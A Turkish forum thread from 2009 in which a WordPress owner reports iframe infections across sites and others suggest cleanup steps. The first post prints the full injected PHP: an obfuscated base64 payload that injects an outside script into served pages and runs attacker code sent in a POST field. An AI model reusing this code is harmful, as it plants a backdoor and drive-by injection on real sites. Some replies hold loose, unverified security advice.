• 29-11-2009, 13:34:20
    #1
    Merhabalar.
    Dün yeni bir wp site kurdum. Şu anda aktif. Kurmadan önce bilgisayarımda virüs taraması yaptım. Herşeyi sildim. Fakat daha 24 saat geçmeden index ve çoğu dosyada iframe görüyorum. Bunun sebebi nedir sizce? Serverda açık mı var anlayamadım. Çok moralim bozuk. O kadar güvenli sistem ve şifre kullanıyorum ki nasıl giriyor bu anlamadım. Diğer sitelerime de aynı şekilde kod girdi.

    Kod da şu ;
    <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbzhuc2cnKSl7ZnVuY3Rpb24gbzhuc2coJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkpoYm01bGNpMW5kWEoxTG1OdmJTOW9kRzFzTDNkbFluTnBkR1ZmWkdWMFlXbHNjeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIG84bnNnMigkYSwkYiwkYywkZCl7Z2xvYmFsJG84bnNnMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkbzhuc2cxKSljYWxsX3VzZXJfZnVuYygkbzhuc2cxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdvOG5zZycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ284bnNnJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG84bnNnbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbzhuc2cyJykpIT0nbzhuc2cyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
  • 29-11-2009, 14:08:36
    #2
    Edit
  • 29-11-2009, 14:09:56
    #3
    Serverdaki başka sitelerden bulaşma olasılığı var lakin sizden %90 kaynaklanıyor.Maalesef bütün webmasterin sorunu.Eğer filezilla kullanıyor iseniz şifreniz kaydedilmekte ve programın cookie dosyalarından bulaşmakta .aynı şey cute ftp içinde geçerli.Yapmanız gereken tek şey var.Ftp programı ile girmeyip!! cpanel yada pleski her neyse firefox dan açıp oradan kodları silmeniz.İndex.php theme-index.php ve tema içindeki index.php dosyalarına bakmanız.

    Aşağıdaki konularıda okuyup birkaç bilgi edinebilirsiniz...

    ZARARLI LİNKLER VE TEMİZLEME


    SİTENİZE BULAŞAN İFRAME VİRÜSLERİNİ TEMİZLEME
  • 29-11-2009, 14:21:24
    #4
    Kimlik doğrulama veya yönetimden onay bekliyor.
    geçmiş olsun, virüsün o bahsettiğiniz koddan yayılacağını sanmıyorum. benim tavsiyem, bilgisayarınızdaki gerekli dosyaların yedeklerini alın. daha sonra format atın (c ve d bölümlerinin silip tekrar oluşturun bu arada). daha sonra sitelerinizi komple silin, tekrar kurun wp'leri. aldığınız yedekleri yükleyin.

    format atmadan ve wp'leri tekrar kurmadan da sorunu halledebilirsiniz. İyi bir virüs programı ve antispyware programı ile bilgisayarı taratın. wp dosyalarını tekrardan ftp'ye atın (üzerine yazdırın),(virüs tüm ftp'deki index.* dosyalarına bulaşıyor, tek tek kontrol etmek yerine komple wp dosyalrın yenileyin.)

    w.arez program kullanmayın, ki çoğu virüs bu c.rack denen dosyalardan bulaşıyor. dandik sitelerden indirdiğiniz temaları da kullanmayın, ne olduğu belirsiz kodlarla uğraşırsınız.

    geçen yaz, yeğenim benim bilgiyarımı 1-2 saatliğine kullanmıştı, bu arada dalmış bu tarz bir virüs, yaklaşık 10 kadar wp siteyi tekrardan kurdum, tam 2 gün uğraştım. gerçekten çok berbat bir virüs bu iframe virüsü.
  • 29-11-2009, 14:22:05
    #5
    Wordpress in sitesinden yeniden indir ftp yi komple silip yenidne kur.
  • 29-11-2009, 18:22:59
    #6
    benim de başıma gelmişti 1 ay boyunca tüm sitelerime bulaştı. başka bilgisayardan tüm şifreleri değiştirdim siteleri yeniden kurdum. düzeldi. ftp programı da kullanmıyorum artık.

    ftp programlarınn cracklerinden bulaşıyor galiba bu virüs. ücretsiz yazılımdaları tercih edin.
  • 29-11-2009, 18:29:25
    #7
    Misafir
    merhaba,

    bu kod bilgisayarınızdan her girdiğiniz ftp ye bulaşır ve siteler çalışmaz hale gelir

    en iyi yapacağınız şey

    1. bilgisyarınıza format atın
    2. Kespersky güncel sürümünü devamlı açık tutun
    3. sitelerinizin yedeğini alın sonra geri yükleyin(dosyaları değil sadece veritabanını geri yükleyin)

    en basit çözüm budur
  • 29-11-2009, 23:26:15
    #8
    Ftp programını değiştirdim ve siteleri temizledim. Bu konuda güvenlik önlemi yok mu? Yani ben bulaştıktan sonra değil de bulaşmadan işlem yapsam daha mantıklı
  • 30-11-2009, 12:31:43
    #9
    daha önce bu iframenin yüzünden başım çok ağrımıştı avg 9 free'yi indirip kurdum çıkan tüm zararlıları temizledikten sonra cpanel ve ftp şifresini değiştirdim.ama değiştirirken olabildiğince uzun karmaşık tutmaya çalış.bunları yaptıktan sonra sorunum kalmadı.